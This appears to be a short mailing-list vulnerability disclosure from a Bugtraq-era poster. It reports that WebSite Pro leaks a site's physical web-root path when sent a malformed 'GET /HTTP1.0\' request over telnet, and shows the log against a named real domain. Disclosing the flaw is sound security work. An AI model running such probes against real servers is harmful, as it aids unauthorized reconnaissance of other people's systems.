WebSite Pro is also revealing the webdirectory of each Website by a simple command line.
This bug is similar to the "IIS revealing webdirectories" bug reported on bugtraq.
On WebSitePro the diference ist the way you retrieve the path.
Example:
(Made with MS Windows Telnet Client)
Logfile:
-----------------------------------------------------------------------start----- --------------------------------------------------------------
GET /HTTP1.0\ <------ Our command we send via Telnet on port 80 to the webserver
Response:
Content-length: 186
<HTML><HEAD><TITLE>Document Moved</TITLE></HEAD>
<BODY bgcolor="White"><H2>Docume
nt Moved</H2>
This document has moved <A HREF="http://www.akte.net/HTTP1.0/">here
</A>.<P>
</BODY></HTML>
GET /HTTP1.0/
Content-length: 230
<HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD>
<BODY bgcolor="White"><H2>404 Not
Found</H2>
The requested URL was not found on this server:<P><CODE>/HTTP1.0/<P>(
D:\WEBROOTS\VHOSTS\aktenet\htdocs\HTTP1.0)</CODE><P>
</BODY></HTML>
Here it shows us, that the HTML files are in D:\WEBROOTS\VHOSTS\aktenet\htdocs.
It's not a large threat but an attacker might gain information about the server which should stay
in Admin's hands. On all Webservers e.g. MS IIS and Apache the response is "error 404".
-------cut------
Elias: I have some html in this mail, try to send it as clear text, as it is, please.
Else people with html capable browsers will only get half of the logfile.
Thx :-)
------cut------
-------------------------------
Lark Lizerman
